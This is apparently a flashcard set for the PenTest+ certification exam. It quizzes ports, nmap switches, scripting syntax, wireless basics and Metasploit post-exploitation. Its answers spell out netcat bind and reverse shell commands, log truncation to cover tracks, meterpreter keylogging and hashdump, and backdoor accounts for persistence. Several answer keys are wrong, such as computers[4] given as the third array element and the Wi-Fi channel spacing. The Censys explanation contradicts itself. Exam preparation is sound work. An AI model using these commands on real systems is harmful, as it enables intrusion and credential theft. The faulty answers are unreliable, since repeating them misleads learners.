PenTest+ General Exam Questions Part 2
What is a first-party hosted environment?
customer owns the equipment and testing is simply subject to the company's policies
What protocol is on port 445?
SMB
What protocol is on port 25?
SMTP
What protocol is on port 161/162(UDP)?
SNMP
What syntax in PowerShell would you use to read the content of a file into a variable? (A) $content = get-content systems.txt (B) content=$(<systems.txt) (C) content=open('systems.txt','w') (D) content = read-file systems.txt
(A) $content = get-content systems.txt To read the contents of a file into a variable in PowerShell, you can use the get-content cmdlet. Peek at "Coding in PowerShell Scripting."
You are looking to assess the security of a web application used by the company. What tool would you use to assess the web application for security vulnerabilities? (A) Burp Suite (B) BeEF (C) Drozer (D) PowerSploit
(A) Burp Suite
We are pentesting for PCI compliance of PCI-DSS Item 2.1, what will we be pentesting for? (A) Default passwords (B) Accounting errors (C) None of these would be testing for PCI-DSS Item 2.1 (D) Vulnerabilities to Public Health Information
(A) Default passwords Testing for default passwords would be testing for PCI compliance with PCI-DSS Item 2.1 in this scenario.
You are performing a pentest for Company XYZ and are assessing the database used by the ecommerce site. You notice that the database stores the customer name, address, city, logon name, and password in plain text within the database. What would you recommend? (A) Encrypt the password (B) Encrypt the logon name (C) Encrypt the city (D) Encrypt the name
(A) Encrypt the password
What statement in Ruby would you use to create a variable and store an IP address in the variable? (A) $ip = "192.168.2.100" (B) $ip == "192.168.2.100" (C) _ip = "192.168.2.100" (D) _ip == "192.168.2.100"
(C) _ip = "192.168.2.100" Ruby variables can start with an _ or a lowercase character.
In this scenario, we have infiltrated the target system of a client for a scheduled PenTest. We are now exfiltrating data from the target system. What phase of the penetration testing process are we currently conducting? (A) Gaining Access (B) Planning (C) Analysis (D) Recon and Scanning
(A) Gaining Access The "Gaining Access" phase is the attack phase of the penetration testing process, and it is also the phase in which a pentester exfiltrates data from the target system.
You have tested a web application and determined it is vulnerable to a SQL injection attack. What remediation step would you recommend? (Choose two.) (A) Input validation (B) Multifactor authentication (C) Parameterized queries (D) Use HTTPS (E) Use HTTP
(A) Input validation (C) Parameterized queries To prevent SQL injection attacks, you should sanitize the data input with validation code and also use parameterized queries
In regards to a pentest, typically clients will provide a pentester with resources to conduct the pentest. Which of the following would be resources provided to a pentester by their client? (A) Network maps (B) SDKs (C) URLs to websites or apps (D) Location of test (E) IP address (F) Time of test
(A) Network maps - A client would very likely give a network map to a pentester as a resource, making it easier for the pentester to plan how to conduct the pentest. (B) SDKs - SDKs (Software Developer Kits) are tools and code libraries that the client would provide to a pentester as a resource. Making it easier to conduct a pentest, which would provide the most benefit to the client. (C) URLs to websites or apps - A client would provide URLs to the companies' web pages and web apps so that the pentester might better perform the pentesting. (E) IP address - A client would typically give a pentester the IP address to the target system. Making it easier to conduct the test against that system.
Which of the following pentesting frameworks was developed by security practitioners? (A) PTES (B) CHECK (C) OWASP (D) NIST SP800-115
(A) PTES
Which of the following pentesting frameworks was developed by security practitioners? (A) PTES (B) CHECK (C) OWASP (D) NIST SP800-115
(A) PTES PTES (Penetration Testing Execution Standard) is a framework developed by security practitioners.
Which of the following statements is not true of the Wassenaar Arrangement? (A) The Wassenaar Arrangement is a legal counsel (B) The Wassenaar Arrangement has 41 nations signed on. (C) The Wassenaar Arrangement intends to improve global security (D) The Wassenaar Arrangement is an export law for technologies.
(A) The Wassenaar Arrangement is a legal counsel The Wassenaar Arrangement has been established in order to contribute to regional and international security and stability, by promoting transparency and greater responsibility in transfers of conventional arms and dual-use goods and technologies, thus preventing destabilising accumulations. The aim is also to prevent the acquisition of these items by terrorists.
You are a penetration tester and have gained access to a remote system using a meterpreter payload. A few days later you attempt to exploit the system again and are unable to. Which of the following represents the best reason why? (A) The system has been patched (B) Meterpreter is out of date (C) The system no longer exists (D) The network IP range changed
(A) The system has been patched The reason the exploit worked the first time is because there was a vulnerability on the system. It is likely the administrator patched the system to remove the vulnerability, which is why you cannot exploit the system using the same technique. This is why you want to create a backdoor after exploiting a system. Check out "Maintaining Access (Persistence)."
You are performing an authorized penetration test on a Windows server and have exploited the system with Metasploit and managed to get a meterpreter session. What command would you use to obtain a list of password hashes for the accounts that reside on that system? (A) hashdump (B) hashit (C) sysinfo (D) hashcat
(A) hashdump hashdump is a post-exploitation command that you can use to obtain the hash values of user accounts. After obtaining the hashes, you could then attempt to crack the password hashes with a tool like John the Ripper.
You wish to display the third element of an array called "computers" on the screen using Python. What command would you use? (A) print (computers[4]) (B) echo (computers[3]) (C) puts (computers[4]) (D) write-host (computers[3])
(A) print (computers[4])
What command do you need to use to specify that you wish to obtain a meterpreter session when the exploit is executed? (A) set payload (B) msfconsole (C) use exploit (D) hashdump
(A) set payload You would set the payload of the exploit you are using to a meterpreter payload. The payload is the type of attack being performed.
You wish to cover your tracks by clearing the logs on a Linux system. What command would you use? (A) truncate -s 0 logfile (B) clearlog logfile (C) dellog logfile (D) purgelog logfile
(A) truncate -s 0 logfile You can use the truncate command in Linux to delete content from a log file. Look over "Covering Your Tracks."
You are scripting in Python and would like to check to see if your variable equals the value: 192.168.2.2. What operator would you use? (A) = (B) == (C) -eq (D) !=
(B) == Python uses the double equals (==) as the comparison operator to check if a variable is equal to a value.
In Bash scripting, you would like to append information to a file. How would you do this? (A) > (B) >> (C) out (D) put
(B) >> In Bash scripting, you can append information to a file using the double redirect (>>). If you want to overwrite the file, you would use the single redirect (>).
Which of the following pentesting frameworks was developed in the UK? (A) OWASP (B) CHECK (C) NIST SP800-115 (D) PTES
(B) CHECK CHECK is the scheme under which NCSC approved companies can conduct authorised penetration tests of public sector and CNI systems and networks in the UK.
You are performing a penetration test for Company XYZ. You would like to generate a password list file from the contents of the customer website. What tool would you use? (A) Medusa (B) CeWL (C) AFL (D) GDB
(B) CeWL CeWL (Custom wordlist generator) is a tool you can use to scan through the pages of a website and pick up on words that are used in the web pages and use them to build a word list file to use with password-cracking tools.
You wish to maintain access to the system after you have exploited it. What could you do to maintain access? (Choose two.) (A) Truncate the logs (B) Create an administrative account (C) Capture keystrokes (D) Run a daemon
(B) Create an administrative account (D) Run a daemon You can maintain access to a system, also known as persistence, by creating a backdoor on the system in the form of a user account or a service (or daemon) running in the background. Peek at "Maintaining Access (Persistence)."
Which of the following are reasons to halt the pentest and communicate with stakeholders about the situation? (Choose two.) (A) Found ports open (B) Critical findings (C) Located running services (D) Additional wireless SSIDs in range (E) Indicators of prior compromise
(B) Critical findings (E) Indicators of prior compromise
What part of the penetration testing report is to contain a high-level overview of the penetration test and its findings for stakeholders to get a quick picture of the company's security posture? (A) Cover page (B) Executive summary (C) Methodology (D) Conclusion
(B) Executive summary
You are performing a pentest for Company XYZ. While assessing the company web server, you notice evidence that the systems had been previously hacked. What would you do? (A) Continue the pentest, but note the evidence to add to the report (B) Halt the pentest and discuss the findings with the stakeholder (C) Halt the pentest and discuss the findings with the IT manager (D) Clean up the evidence and continue the pentest
(B) Halt the pentest and discuss the findings with the stakeholder
You want to perform a vulnerability scan of a system on the network. What tool would you use? (A) Hydra (B) Nessus (C) Maltego (D) SQLmap
(B) Nessus
Which of the following pentest frameworks is a guideline for web applications? (A) OSSTMM (B) OWASP (C) PTES (D) CHECK
(B) OWASP
How do you end an if statement in Bash shell scripting? (A) end (B) fi (C) } (D) end if
(B) fi
You are trying to capture the keystrokes from a meterpreter session. You migrated to explorer.exe and have run the keyscan_start command, but keystrokes do not appear. What should you do? (A) keyscan_stop (B) keyscan_dump (C) migrate explorer.exe (D) keyscan_print
(B) keyscan_dump To view the keystrokes that were captured, you need to run the keyscan_dump command. Study "Common Post-Exploitation Tasks."
You wish to set up a bind shell on the target Windows system you are assessing whose IP address is 10.0.1.5. What command would you use on that system to set up the bind shell? (A) nc 10.0.1.5 -p 5555 -e cmd.exe (B) nc -n -v -l -p 5555 -e cmd.exe (C) nc -10.0.1.5 -e cmd.exe (D) nc -n -v -p 5555 -e cmd.exe
(B) nc -n -v -l -p 5555 -e cmd.exe Because you are looking to set up a bind shell on the target system, you are looking to set up the listener, which uses nc with a -l switch (for listener). In this scenario you are also working with a Windows target system, so the command to execute should be cmd.exe (with -e). Peek at "Setting up a bind shell."
You are creating a script in Ruby and wish to output information on the screen. What command would you use? (A) gets (B) puts (C) write (D) out
(B) puts
You are the penetration tester authorized to perform a penetration test for an organization. You have exploited one of the target systems and wish to discover other systems on the network. What meterpreter command would you use? (A) run post/windows/gather/hashdump (B) run arp_scanner (C) sysinfo (D) run killav
(B) run arp_scanner You can use the run arp_scanner command and include the IP range as a parameter to detect other systems that exist on the same network as the target
You would like to assess a core software application used by your customer while doing a penetration test. What software-assurance tool would you use to send random input to the application to assesses how it responds? (A) nc (B) Hashcat (C) AFL (D) Mimikatz
(C) AFL In this scenario we are looking for a fuzzing tool. AFL is an example of a fuzzing tool that will send arbitrary input to an application to assess how it handles the input. Check out "Software assurance." American Fuzzy Lop is a brute-force fuzzer coupled with an exceedingly simple but rock-solid instrumentation-guided genetic algorithm. It uses a modified form of edge coverage to effortlessly pick up subtle, local-scale changes to program control flow.
What tool would you use to crack password hashes that you have obtained in a previous step of your assessment? (Choose two.) (A) Peach Fuzzer (B) theHarvester (C) Cain and Abel (D) OWASP ZAP (E) John the Ripper
(C) Cain and Abel (E) John the Ripper
One of your pentesters has created the pentest report to deliver to the customer. What recommendation would you give to the pentester before the pentester sends the report to the customer? (A) Perform a spell check (B) Include all pentesters in the email message (C) Encrypt the report (D) Store multiple copies of the report on backup media
(C) Encrypt the report
What remediation step would you recommend to an organization that has a number of users storing and accessing company data in the cloud? (A) Single-factor authentication (B) Dual Internet line (C) Multifactor authentication (D) Use HTTP for more secure transmissions
(C) Multifactor authentication
During the pentest you notice that the administrator account on five out of eight servers is using the same password. What feedback would you give to the customer? (A) Set the same password on the remaining three servers (B) Reset the admin password for all eight servers to the same new password (C) Recommend a randomize credentials tool (D) Delete the admin account on the five servers
(C) Recommend a randomize credentials tool
Authorization to perform a pentest is most commonly included within the ____. (A) NDA (B) MSA (C) SOW (D) Wassenaar Arrangement
(C) SOW The SOW (Statement of Work) is a contract that establishes the scope and formal authorization for a pentest.
In this scenario, we are hosting business critical systems with a cloud services provider. What type of target best describes our business critical systems? (A) Off-site (B) On-site (C) Third-party hosted (D) First-party hosted
(C) Third-party hosted In this scenario, our business critical systems are an example of a third-party hosted target because we are hosting our business critical systems with a cloud services provider.
You wish to prompt for an IP address in your Python script, what command would you use? (A) $ipaddress = gets('Please enter IP address of system to scan:') (B) ipaddress == input('Please enter IP address of system to scan:') (C) ipaddress = input('Please enter IP address of system to scan:') (D) ipaddress = read-host "Please enter IP address of system to scan"
(C) ipaddress = input('Please enter IP address of system to scan:')
You would like to configure a reverse bind shell. Your pentester system has the IP address 10.0.1.2, while your Linux target has the IP address 10.0.1.5. What command would you use on a Linux target system for the reverse bind shell? (A) nc -n -v 10.0.1.2 5555 -e cmd.exe (B) nc -n -v -l 5555 10.0.1.2 -e /bin/bash (C) nc -n -v 10.0.1.2 5555 -e /bin/bash (D) nc -n -v -l 5555 10.0.1.5 -e cmd.exe
(C) nc -n -v 10.0.1.2 5555 -e /bin/bash In this scenario you are looking to set up a reverse shell, so the listener (-l) would be on the pentester's system. The reason I mention this is because the question is asking you what command you would use on the target, so you are looking for a command without -l. You also are looking for a command to use on a Linux target so -e should reference /bin/bash instead of cmd.exe. Take a look at "Getting a reverse shell."
You wish to make a call on a remote system and run a command prompt on that system. What command would you use? (A) start (B) runas (C) psexec (D) whoami
(C) psexec PSExec is a command that allows you to make a remote call to a system and execute a program on that system. As a pentester, you can use this to make a call to a command prompt of the system. Peek at "Performing Lateral Movement."
You jumped out of your meterpreter session to do a port scan. What command would you use to view the list of meterpreter sessions? (A) listsession (B) show-sessions (C) sessions (D) displaysessions
(C) sessions To display a list of meterpreter sessions on your Kali system, you can use the sessions
You are using an if statement in Bash shell scripting and want to check to see if the $port is less than 1024. What operator would you use? (A) < (B) << (C) != (D) -lt
(D) -lt Bash shell scripting uses -lt as the less than comparison operator. Review "Using Bash Scripting."
In this scenario, we are a pentest within the United States performing a pentest on an unwilling company within the United States. Which of the following computer crime laws have we just violated? (A) MSA (Master Service Agreement) (B) Computer Misuse Act 1990 (C) Wassenaar Arrangement (D) 18 USC 1030
(D) 18 USC 1030 The 18 USC 1030 is a computer crime law defining unauthorized access to a computer or network. It is a law for computer crime in the united states.
After performing an assessment of Company XYZ, you have recommended a remediation step of system hardening. Which of the following is an action performed during system hardening? (A) Implement multifactor authentication (B) Use HTTPS (C) Implement input validation (D) Disable unnecessary services
(D) Disable unnecessary services
You exploited a Windows system and wish to record the keystrokes of the victim. What must you do before you can start recording keystrokes? (A) Kill antivirus software (B) Obtain a shell (C) Enable the webcam (D) Migrate to the explorer.exe process
(D) Migrate to the explorer.exe process Before you can record keystrokes from a meterpreter session, you must attach to explorer.exe using the migrate command first. Review "Common Post Exploitation Tasks."
You are performing a penetration test for a company and the company Intranet server is in the scope of the assessment. What tool would you use to determine if there are any vulnerabilities with the web server? (A) Ncat (B) Maltego (C) Hashcat (D) Nikto
(D) Nikto
You have delivered and reviewed the pentest report with the customer. You are now ready to perform post-engagement cleanup. Which of the following is not an activity during postengagement cleanup? (A) Remove shells (B) Remove tools (C) Remove tester-created credentials (D) Remove unnecessary services
(D) Remove unnecessary services
You are assessing the security of a web application that connects to a database to display inventory data. What tool would you use to test the web application against SQL injection attacks? (A) OpenVAS (B) Medusa (C) Cain and Abel (D) SQLmap
(D) SQLmap
What keyword in Ruby is used to catch exceptions? (A) catch (B) except (C) exception (D) rescue
(D) rescue
You wish to perform a port scan after obtaining a meterpreter session on a target system. You placed the meterpreter session in the background and added a route to the meterpreter session for the target network. What command would allow you to set up a port scan? (A) use auxiliary/tcp (B) use exploit (C) net user (D) use auxiliary/scanner/portscan/tcp
(D) use auxiliary/scanner/portscan/tcp You can use the portscan auxiliary module to perform a port scan on the network and identify services running on other systems. The goal is that you will try to exploit these systems in order to move laterally across the network. Take a look at "Performing Lateral Movement."
Differences between 2.4 GHz and 5 GHz?
- 5 GHz has higher transfer speeds - 2.4 GHz has higher coverage range - In the 2.4 GHz spectrum, each channel is separated by 5 MHz within the lower, center, and upper frequencies. In the 5 GHz spectrum band, each channel is separated by 10 MHz within the lower, center, and upper frequencies.
What are the 3 main types of wireless (802.11) frame types?
- Management: enables the stations to establish and sustain communication over the network with an access point. Facilitating the authentication, association, and synchronization. - Control: helps ensure that data frames are delivered to each station. - Data: transfers the data within the body of the frame from higher layers of the OSI model, such as web content from an HTTP GET request.
What are the two types of WiFi network discovery?
- Stumbling is a surveillance technique used for discovering SSIDs, router vendor information and signal strength, MAC addresses, channels, access control protections (encryption), etc. This process is a little more involved than just enabling Wi-Fi on your phone to see if you can find any open access points to connect to. - Wardriving is a tactical process for surveying an area for access points while in a moving vehicle. The goal is preliminary reconnaissance and to pinpoint wireless networks and potential targets in a certain area of interest.
What do the following nmap switches do? -sL -sn -Pn -PS/PA/PU/PY [portlist] -n -v/-vV -oN/ -oX / -oG <file> -oA <basename> -PR -sT/ -sS/ -sU --script/ -sC --max-retries <tries> --host-timeout <time>
-sL: lists the targets to scan and does a reverse DNS lookup -sn: ping scan, disables port scan -Pn: disables ping, treats all hosts as online, skips host discovery -PS/PA/PU/PY [portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports -n: no DNS resolution -v/-vV: increases verbosity level of scan output -oN/ -oX / -oG <file>: outputs scan in normal, XML and grepable formats -oA <basename>: outputs into the three major formats at once -PR: ARP Ping, ARP scan puts Nmap and its optimized algorithms in charge of ARP requests. And if it gets a response back, Nmap doesn't even need to worry about the IP-based ping packets since it already knows the host is up. This makes ARP scan much faster and more reliable than IP-based scans. So it is done by default when scanning ethernet hosts that Nmap detects are on a local ethernet network. This is used by default if running as a privileged user on the LAN. -sT/ -sS/ -sU: TCP scan / SYN scan / UDP scan --script/ -sC: specify nmap script to use --max-retries <tries>: specify amount of port scan probe retransmissions --host-timeout <time>: give up on scanning target after this long (default time value is measured in seconds)
What WiFi protocols use only the 5GHz frequency?
802.11a & 802.11ac
What WiFi protocols use only the 2.4 GHz frequency?
802.11b & 802.11g
What WiFi protocol uses 2.4 & 5 GHz frequency?
802.11n
MITRE is a nonprofit organization that provides access to public community resources for conducting vulnerability research and analysis. Which community resources are provided by MITRE? (Select all that apply.) A. CWE B. CEW C. CEV D. CVE E. CAPEC
A, D, E. CWE, CVE, and CAPEC are the correct answers.
All of the following file types (extensions) are supported in FOCA except which one? A. .exe B. .xls C. .doc D. .pdf E. .sxw
A. All of the options are file types/extensions that are supported by FOCA except for .exe, which are executables.
What are the two modes for wireless networks?
Ad-hoc & infrastructure
IEEE defines three wireless frames within the wireless standard for Wi-Fi network devices. Which frame is ultimately used for authentication? A. Management frame B. Control frame C. Monitor frame D. Data frame
A. Management frames enable stations or clients to maintain communication with the AP and include multiple subtypes, including authentication.
In wireless networks, which frame is a type of management frame that identifies the SSID, encryption type, and MAC address of an access point? A. Beacon frame B. Probe request frame C. Data frame D. Association response frame
A. The beacon frame includes the important connection and association information with the other stations/clients from the AP.
A suite of tools that provide capabilities for conducting RF communication monitoring and wireless network security auditing is called? A. airman-ng B. aircrack-ng C. airmon-ng D. airmmn-ng
B. Aircrack-ng provides a suite of tools that can be used for monitoring and attacking Wi-Fi networks.
Under the IPv4 Hosts view in Censys, the user has the option to apply a filter by clicking on a selection under the following categories except which one? A. Filter By AS B. Filter By Port C. Filter By Protocol D. Filter By Tag
B. Port is not a valid selection. The selections that can be used for applying a filter are found on the Censys results page, after executing a query.
Nessus plugins are written in which type of proprietary language? A. NCE B. NASL C. NSAL D. Nessus
B. The Nessus Attack Scripting Language (NASL) is the correct answer.
Written authorization that gives the pentest team the authority to proceed with an engagement can be found in which document? A. MSA B. RoE C. SOW D. MBA
B. The rules of engagement document can be found in the SOW or can be a separate artifact altogether. This document outlines the provisions for the engagement and how the execution of the pentest may proceed. After receiving written authorization in the RoE, the pentest team may proceed with the authority to test.
What are beacon frames?
Beacon frames are a subtype of the management frame. It includes properties that disclose details about the AP that are used for association, including the SSID, type of encryption, MAC, channel, and vendor information.
How many wireless channels are available on the 2.4 GHz band within the United States? A. 12 B. 14 C. 11 D. 10
C. Each country has its own specifications on supported wireless channels. A total of14 channels in the 2.4 GHz band are supported around the world. However, only 1 to 11 are supported in the United States.
While using Shodan, the pentest team is investigating open ports and services for an organization's public-facing web server. Which of the following options could the pentest team use in the search criteria as a filter to return only results with HTTP? (Select the best option.) A. HTTP port:23 B. HTTP port:88 C. HTTP port:80 D. HTTPS port:443
C. The question was looking to apply a filter to the results to search specifically on HTTP. The standard port for HTTP traffic is port 80.
What are the differences between TCP and UDP port scans?
Connection-oriented scans use the TCP protocol and evaluate the state of TCP-based ports and services, and are the most reliable. UDP scans follow a less advantageous pattern of success, as they offer little to no reliability as to whether a port is available over the network. UDP ports that are open do not respond to a scan request. Closed UDP ports respond with an ICMP type 3 "port unreachable" message. Nmap will infer that the port is either open or filtered in the event it does not receive a message from the target host.
Maltego allows the user to build visualizations between all of the following except which one? A. Names B. Email addresses C. Social networks D. Archives E. Websites
D. All of the options are correct with the exception of archives. Names, email addresses, social networks, and websites are all bits of information that can be collected and visualized within Maltego.
Which command in Recon-ng can be used to look up supported modules within the framework? A. search modules B. help modules C. search D. show modules
D. Although you can use the search command to look for keywords found in module names, the correct option to list all of the available modules is show modules.
During a pentest, you use theHarvester to conduct passive information collecting to gather email addresses, hosts, and domain names. If you wanted to use Shodan to search ports and service information for each of the hosts you collected, which switch would you use within the framework? A. -b B. -t C. -H D. -h
D. The -h option allows the user to use the Shodan database to query for host information.
Which port scan method is also known as a half-open scan that never establishes a true connection with the target host over the network? A. TCP scan B. UDP scan C. SYN ACK D. SYN scan
D. The TCP SYN scan is also known as the half-open scan, as it never completes the three-way handshake.
The CVE Dictionary is a standard used for documenting which type of vulnerabilities? A. Public B. Privately allowed C. Privately disclosed D. Publicly disclosed
D. The correct answer is publicly disclosed. Although CVE numbers can be reserved for nonpublicly disclosed vulnerabilities, it is the standard used for publicly known vulnerabilities.
What protocol is on port 67?
DHCP
What is a third-party hosted environment?
Environment not hosted by the customer so it may be a cloud service provider (CSP), then testing is not only subject to the company's policies, it is also subject to the third-party's acceptable use policies. For instance, Amazon Web Services (AWS) requires that tenants submit pentesting request forms to receive authorization prior to penetration testing to or from any AWS resource. More information can be found at https://aws.amazon.com/security/penetration-testing.
What tools are used to brute force passwords?
John the Ripper (JTR for short and can conduct both dictionary and brute-force password attacks), Cain and Able, and Hashcat
What protocol is on port 389(TCP/UDP)?
LDAP
What is limited access for internal testing?
Limited access affords the initial connectivity to the targets, such as a physical connection to the network switch, the service set identifier (SSID) and password to the Wi-Fi network, or having an IP address whitelisted.
What are the three different antenna types?
Omnidirectional - Radiates radio waves power equally in all direction. Designed to pickup signals in all directions, with limited range. Supports 2.4 or 5 GHz Patch - Radiates radio wave power in a single direction. Designed to pick up signals in certain areas of focus from shorter distances. Improves wireless target range and supports 2.4 or 5 GHz Yagi - Radiates radio wave power in a single direction. Designed to pick up signals in certain areas of focus from greater distances. Improves wireless target range and supports 2.4 or 5 GHz
What protocol is on port 1433?
MSSQL
What protocol is on port 3306?
MySQL
What protocol is on port 2049(TCP/UDP)?
NFS
What protocol is on port 123?
NTP
What protocol is on port 137-139 (TCP/UDP)?
NetBIOS
What is privileged-level access for internal testing?
Privileged-level access can be used to conduct various types of testing to include escalating local-admin privileges to domain-level access, inspecting operating system patch levels, or determining if a system is configured in accordance with a specific policy, such as in the case of compliance testing.
What protocol is on port 3389?
RDP
What protocol is on port 135?
RPC
What are the different timing template levels on nmap?
T0 - paranoid T1 - sneaky T2 - polite T3 - normal (nmap default) T4 - aggressive T5 - insane
What protocol is on port 69?
TFTP
A UDP port scan returns nothing for a given port. What does this mean?
The port is open or filtered. It is possible that the port may be open or possibly packet filters applied at a firewall are blocking the communication.
What is user-level access for internal testing?
User-level access assumes the identity of a trusted insider with basic permissions that a typical user in the organization would have. An account can be created either locally or in the account management system, such as Active Directory, to simulate the user for testing. The goal is to gain additional levels of access through privilege escalation.
What protocol is on port 902?
VMware Server
What are the three levels of access for internal testing?
• Limited access • User-level access • Privileged-level access